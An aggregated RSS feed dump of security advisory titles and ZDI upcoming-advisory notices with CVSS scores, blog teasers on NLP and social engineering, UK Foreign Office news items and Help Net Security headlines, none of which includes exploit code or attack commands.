==> TPTI-11-15 - Novell ZENWorks Software Packaging ISGrid.Grid2.1 bstrSearchText Parameter Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENWorks. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-14 - Adobe Shockwave DEMX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-13 - McAfee SaaS myCIOScn.dll Scan Method Script Injection Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> TPTI-11-12 - McAfee SaaS MyAsUtil5.2.0.603.dll SecureObjectFactory Instantiation Design Flaw Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> How to Quickly Create New Habits in Your Life

http://feeds.feedburner.com/epistemeca A friend of mine mentioned that she was having trouble getting in the habit of going to the gym every morning, so I promised an explanation of how I have created so many beneficial habits in my life in the past year. I thought that the email that I sent her might actually be [...]

==> Matching and Mirroring (or: Cybernetic Issues in NLP)

http://feeds.feedburner.com/epistemeca One of the fundamental tenets of Neurolinguistic Programming (NLP) is the idea of “matching and mirroring” – the idea that we create rapport between individuals by mirroring aspects of their physiology in ourselves and, because they see someone who looks like them, they’re more likely to enter in to a rapportive state with us. This [...]

==> My Newest Experiment – The Kindle Book

http://feeds.feedburner.com/epistemeca A few months ago, my friend Drawk Kwast released his first ebook on the Kindle store. And he’s been having some great success (mostly because the book is awesome). Shortly after, I got my first Kindle and was fascinated by all of the low-cost and interesting self-published books on there that I wouldn’t have [...]

==> Maturity and Business

http://feeds.feedburner.com/epistemeca I wrote recently on Maturity and the way I’ve been trying to view my life lately. The place that I’ve found this thinking most interesting is in conceiving of my businesses (esp. THA). It’s easiest to try to solve most of our business problems in the frame of “what’s best for us right now?”. Especially in [...]

==> What is it to be Mature?

http://feeds.feedburner.com/epistemeca I was having a conversation with a friend the other night about maturity and social connection. We tossed around the question of what it is to be “mature”. According to Wikipedia, maturity is “how a person responds to the circumstances or environment in an appropriate and adaptive manner…. Maturity also encompasses being aware of the [...]

==> A Branding MAD Lib

http://feeds.feedburner.com/epistemeca As a new year begins, I always spend a bunch of time pondering my past, my future, and where I’m going. A big part of that is branding and positioning – who am I, and what problem do I want the people in my life to have when they think only of me. This [...]

==> Suppressing Dissent

http://feeds.feedburner.com/epistemeca I once heard it said (and I can’t find the quote) that a society’s level of freedom isn’t determined by how it treats its normal citizens – it’s determined by how it treats those who dissent and don’t adhere to society’s norms. Nowhere do I find this more evident than in the Byron case. Look, [...]

==> Byron (and influence through the media)

http://feeds.feedburner.com/epistemeca If you’re following the Toronto news today, one of the main stories out there is about a former team member of mine, Byron Sonne. The news coverage (CNN, Yahoo) paints Byron to be one step this side of Timothy McVeigh… explosives, threatening police, etc. And that doesn’t even mention that the picture that they’re using [...]

==> Influence and Failing Kindergarten

http://feeds.feedburner.com/epistemeca Had a great chat with my friend Drawk Kwast recently that he recorded for his list of users (which was an honor given the people he usually interviews). As expected, we rambled all over the map and talked about a million different topics around influence, living an adventurous and successful life, and always being willing [...]

==> Return-to-Barry-White Human Exploitation

http://feeds.feedburner.com/epistemeca Spent a weekend in early October hanging out with Tom and Kim at their rapport and anchoring bootcamp. And I was talking in email with my friend Cris Neckar afterward where we were talking about the large number of pre-existing anchors that exist within someone's already vast consciousness. Cris's comment was that using pre-existing material [...]

==> NLP for Social Engineers

http://feeds.feedburner.com/epistemeca Anybody in the industry who has talked to me about NLP has understood my utter frustration about the state of NLP learning and its application to social engineering. It got me riled up enough to do a post on NLP and science a few months ago. And, for the past few months, I’ve been pondering [...]

==> Hacker Halted Redux

http://feeds.feedburner.com/epistemeca I had a blast at Hacker Halted last week, and I did a talk that I was incredibly excited about. It was the first time I was going to talk about some of the new research I’ve done and, while I didn’t plan to give out a huge number of details on the methods, I [...]

==> Recap: The Hope Symposium

http://feeds.feedburner.com/epistemeca This past weekend, I had the privilege of speaking at The Hope Symposium. It was a small conference put on by my friends over at NLP Canada. I was actually lucky enough to speak twice at the conference: I was the opening speaker and the final speaker before Chris and Linda closed out the [...]

==> Social Engineering Abounds

http://feeds.feedburner.com/epistemeca I’ve been ranting for years that we need more exposure about the threat that is Social Engineering. As time goes on, we move more toward a model where the human is the prime exploit target. I just found out that some other people are thinking the same way. Today launches the first Social Engineering Framework. [...]

==> Greed as a prime motivator

http://feeds.feedburner.com/epistemeca I found this article the other day about the teen in Great Britain who managed to completely dupe a bunch of airline executives into believing that he was a millionaire who was looking to buy into their company and expand it. The key to the attack is that greed was the prime motivator in the [...]

==> Constraints and The Bandwidth Problem

http://feeds.feedburner.com/epistemeca I got in a conversation last week about the upcoming bandwidth crisis in the core. I’ve managed to forget about those issues more and more over the past few months. I've spent a lot of time thinking about vulnerability research and social engineering lately at the expense of a lot of other security thinking. But [...]

==> Social Networking and Security

http://feeds.feedburner.com/epistemeca Lately, I’ve been thinking more and more about social networking. I was reading a recent article by Eric Ogren on this issue at Searchsecurity.com. The article said: “According to a recent Websense Inc. survey, the decision has already been made by the business units with 86% of IT respondents reporting pressure to allow more social [...]

==> Obama and Hypnosis

http://feeds.feedburner.com/epistemeca I was on the Altered Egos radio program from Nanaimo, BC this morning, and we were talking about hypnosis, NLP and influence as it relates to political speech, advertising, etc. I mentioned an awesome paper about Obama’s use of hypnotic language and patterning – the paper can be found here. In most of its moral [...]

==> NLP is not Science

http://feeds.feedburner.com/epistemeca One of the people whose work I have enjoyed of late is Gadi Evron. I find that he and I approach problems and random things very similarly (although he blogs his results far, far more frequently than I do… mine just get saved up for classes, webinars and articles). So, Gadi posted recently about his [...]

==> Six Sigma and App Security

http://feeds.feedburner.com/epistemeca From a note that Hoff tweeted, I ended up reading Jeremiah’s awesome new post in which he asked the following question: “How do you achieve quick wins in Web Application Security, rooted in software, with measurable results that CIOs would appreciate? ” I started a thread on twitter with my answer, but that’s not the [...]

==> Foreign Office website moved to GOV.UK

http://feeds.feedburner.com/FcoLatestNewsRssFeed The Foreign Office is publishing its news and policy on GOV.UK, the new place to find government information.

==> Minister for Europe renews UK commitment to EU enlargement

http://feeds.feedburner.com/FcoLatestNewsRssFeed Minister for Europe David Lidington has set out the UK’s continued commitment to EU enlargement following his participation in the General Affairs Council meeting in Brussels on 11 December.

==> North Korean Ambassador summoned to Foreign and Commonwealth Office

http://feeds.feedburner.com/FcoLatestNewsRssFeed The North Korean Ambassador in London was summoned by the Permanent Under Secretary of State at the Foreign Office following news of the launch of a satellite by North Korea earlier today.

==> Championing Britain through commercial and economic diplomacy

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Secretary William Hague tells British diplomats they must intensify work to champion the UK as a destination for foreign investment.

==> Foreign Secretary remarks at the Friends of Syria meeting

http://feeds.feedburner.com/FcoLatestNewsRssFeed The Foreign Secretary William Hague has outlined the immediate responsibilities for the Friends of Syria at the meeting in Marrakesh.

==> Government publishes Afghanistan progress report

http://feeds.feedburner.com/FcoLatestNewsRssFeed The Foreign Secretary William Hague has updated parliament on progress in Afghanistan during October 2012.

==> Parental child abduction is a worldwide problem

http://feeds.feedburner.com/FcoLatestNewsRssFeed New figures reveal that the number of parental child abduction cases dealt with by the Foreign Office has risen by 88% in just under a decade.

==> Foreign Secretary condemns DPRK’s satellite launch

http://feeds.feedburner.com/FcoLatestNewsRssFeed Commenting on the launch of DPRK’s satellite, the Foreign Secretary, William Hague said:

==> UK calls for an immediate return to civilian rule in Mali

http://feeds.feedburner.com/FcoLatestNewsRssFeed Foreign Office Minister for Africa Mark Simmonds has tonight underlined his concern over the situation in Mali and called for an immediate return to civilian rule.

==> Piracy Ransoms Task Force publishes recommendations

http://feeds.feedburner.com/FcoLatestNewsRssFeed Today the Piracy Ransoms Task Force presented its conclusions on how to work together to reduce the threat of piracy and ultimately ransom payments to pirates.

==> Samsung Galaxy devices' lock screen easily bypassed

http://feeds.feedburner.com/HelpNetSecurity This week revealed not one, but two security vulnerabilities that allow anyone to bypass the lock screen on a variety of Samsung Android smartphones. On Monday UK blogger Terence Eden showed how it'...

==> Google reports on non-court ordered FBI data requests

http://feeds.feedburner.com/HelpNetSecurity With every new Transparency Report that Google has released biannually since 2009, new information about data requests from government agencies is included. This last report, which spans July to Dece...

==> Malicious Java applet uses stolen certificate to run automatically

http://feeds.feedburner.com/HelpNetSecurity A signed but malicious applet that will apparently fool even the latest Java 6 update has been discovered on a German online dictionary website infected by the g01pack exploit kit, warns security rese...

==> 99 percent of web apps vulnerable to attack

http://feeds.feedburner.com/HelpNetSecurity A new Cenzic report demonstrates that the overwhelming presence of web application vulnerabilities remains a constant problem, with an astounding 99 percent of applications tested revealing security r...

==> Identity theft on the rise this tax season

http://feeds.feedburner.com/HelpNetSecurity The threat of identity theft this tax season leaves consumers with more to worry about than whether or not a tax return is in the mail. A thief may use sensitive information, such as a Social Secur...

==> Bogus Delta receipt confirmation leads to malware

http://feeds.feedburner.com/HelpNetSecurity Once again, Delta Air Lines customers are being targeted with spoofed emails supposedly carrying their eTicket, and are urged to download and open the attached PDF file purportedly containing it, or t...

==> The Chinese time bomb

http://feeds.feedburner.com/HelpNetSecurity At Seculert, when we analyze a targeted attack, we are trying to help our customers understand the intention of the attackers, as we look how the attack evolves over time. In some cases, understanding...

==> Static analysis tool for examining binaries

http://feeds.feedburner.com/HelpNetSecurity GrammaTech announced a static-analysis tool for analyzing binary libraries and executables. CodeSonar for Binaries enables users to examine software for security vulnerabilities and malicious code, wi...

==> Dell SecureWorks expands incident response services

http://feeds.feedburner.com/HelpNetSecurity Dell SecureWorks is expanding its incident response (IR) services to counter the growing severity and frequency of breaches. Many organizations aren't equipped internally to plan for and respond to to...

==> Enterprise security for businesses addressing privacy obstacles

http://feeds.feedburner.com/HelpNetSecurity Protegrity announced deeper enterprise security for global businesses addressing privacy obstacles such as cross-border data transfer and industry specific regulatory compliance. Ever-changing priv...

==> Longline phishing attacks rely on mass customization

http://feeds.feedburner.com/HelpNetSecurity Proofpoint released a wide-ranging study that identified a new class of sophisticated and effective, large-scale phishing attack dubbed "longlining". Longlining, which is named after the industrial fi...

==> New exploit kit concentrates on Java flaws

http://feeds.feedburner.com/HelpNetSecurity Webroot's Dancho Danchev is known for combing through the wilds of the Internet for places where cyber criminals congregate and reporting back with interesting news about tools and services offered fo...

==> Older MiniDuke strain found, raises questions about its origins

http://feeds.feedburner.com/HelpNetSecurity A version of MiniDuke - the cyberspy malware aimed at governments and agencies in Europe and elsewhere - has been operating for at least 21 months, internet security firm Bitdefender has discovered. ...

==> Gang arrested for hacking and stealing from exchange companies

http://feeds.feedburner.com/HelpNetSecurity The Dubai police has arrested three people allegedly belonging to a crime gang that managed to steal nearly $2 million from Dubai exchange companies with the help of hackers. The hackers have broke...

==> Conflicting views on cloud security responsibility

http://feeds.feedburner.com/HelpNetSecurity CA and the Ponemon Institute released a study that shows companies have improved their practices around cloud computing security compared to a previous study from 2010. Still, the responses raise q...

==> Oracle releases emergency patch to fix exploited Java flaw

http://feeds.feedburner.com/HelpNetSecurity Oracle has released an out-of-band Java patch to fix the CVE-2013-1493 vulnerability that is currently being exploited in attacks in the wild. The security alert accompanying the release says tha...

==> Safe iOS web surfing for kids

http://feeds.feedburner.com/HelpNetSecurity Net Nanny for iOS brings safe web browsing and surfing for kids of all ages to iPod Touch, iPhone and iPad using iOS 5.0 or later. Available from the App Store for $4.99, Net Nanny for iOS is a c...

==> Open standards are key for security in the cloud

http://feeds.feedburner.com/HelpNetSecurity The current divide between proprietary and open approaches to enterprise cloud computing has implications beyond the obvious. More than just issues of cloud interoperability and data portability, open...

==> Dangerous beans: Oracle deep in the storm

http://feeds.feedburner.com/HelpNetSecurity Last week security researchers from FireEye discovered a new Java exploit that works against the latest versions of Java (version 6 update 41 and version 7 update 15), making this a zero-day. The flaw...

==> Half of companies have lost a device with important data

http://feeds.feedburner.com/HelpNetSecurity Half of companies have lost a device with important company data on it, causing security implications for over a fifth of organizations, according to Varonis. 57% of employees believe that BYOD put...

==> VASCO launches new card reader for transaction signing and PKI applications

http://feeds.feedburner.com/HelpNetSecurity VASCO launched DIGIPASS 870, a USB connectable card reader which can be used in both connected and unconnected mode. In connected mode DIGIPASS 870 can be used for a number of PKI-based, e-banking ...

==> Auditing of Web apps with analytics dashboard for compliance

http://feeds.feedburner.com/HelpNetSecurity SaaSID has launched Cloud Application Manager 2.0 (CAM), the latest version of its browser-based authentication, management and auditing solution. CAM 2.0's audit report is now displayed in CAM A...

==> Blackhole outfitted with exploit for recently patched Java flaw

http://feeds.feedburner.com/HelpNetSecurity The exploit for the recently patched CVE-2013-0431 Java vulnerability has been added to the Blackhole exploit kit, Trend Micro researchers report. The fact was discovered through the analysis of th...

==> Safari now blocks all but latest version of Flash plugin

http://feeds.feedburner.com/HelpNetSecurity With all the Flash Player and Java zero-day vulnerabilities lately getting exploited in attacks, browser vendors are trying to come up with solutions to protect their users without antagonizing them w...

==> Kaspersky PURE 3.0 Total Security released

http://feeds.feedburner.com/HelpNetSecurity Kaspersky Lab released Kaspersky PURE 3.0 Total Security, which offers protection for users to secure their online activities and digital assets across their home network of PCs. Here are some of...

==> Warning from "Mark Zurckerberg" leads to account hijacking

http://feeds.feedburner.com/HelpNetSecurity If you get an email sent by "Mark Zurckerberg", saying your Facebook account might be permanently suspended because of violations of the social network's Terms of Service, fight the urge to follow th...

==> Jailed British hacker hacks own prison's mainframe

http://feeds.feedburner.com/HelpNetSecurity A UK cyber criminal jailed in a maximum security prison has managed to hack into the institution's mainframe after having been allowed to participate in IT lessons, the Daily Mail reports. The in...

==> Evernote breached, forces service-wide password reset

http://feeds.feedburner.com/HelpNetSecurity The popular notetaking and archiving service Evernote has notified its 50+ million users that the service's internal network has been breached by attackers and that they are forcing a password reset f...

==> Review: Wide Open Privacy: Strategies For The Digital Life

http://feeds.feedburner.com/HelpNetSecurity Authors: J.R. Smith and Siobhan MacDermott. Pages: 190. Publisher: IT-Harvest Press. ISBN: 0985460733. Introduction: We live in a digital age where it's become normal to see people post photos...

==> Security is changing, organizations are unprepared

http://feeds.feedburner.com/HelpNetSecurity F5 Networks announced the findings of its 2013 RSA Security Trends Survey, which revealed that organizations are struggling to keep pace with the changing face of security. Respondents were RSA attend...

==> SANSFIRE 2011

http://feeds.feedburner.com/SansInstituteAtRiskAll?format=xml SANSFIRE 2011

==> ZDI-CAN-1795: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1790: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'Brett Gervasoni' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1787: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1784: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1768: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1767: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1766: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1765: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1764: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1763: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1761: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1760: Hewlett-Packard, Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1759: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1752: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1749: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1745: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1744: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1741: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1731: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1730: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1729: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1624: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1623: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1622: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1621: GE

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'ZombiE and amisto0x07' was reported to the affected vendor on: 2013-02-22, 0 days ago. The vendor is given until 2013-08-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1743: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1742: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1735: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1734: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2013-02-15, 7 days ago. The vendor is given until 2013-08-14 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1692: F-Secure

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-14, 8 days ago. The vendor is given until 2013-08-13 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1772: ABB

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-13, 9 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1747: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-13, 9 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1688: Avaya

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-13, 9 days ago. The vendor is given until 2013-08-12 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1478: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2013-02-11, 11 days ago. The vendor is given until 2013-08-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1746: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1718: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1717: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1716: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1713: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Mil3s beep' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1565: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2013-02-01, 21 days ago. The vendor is given until 2013-07-31 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1684: Citrix

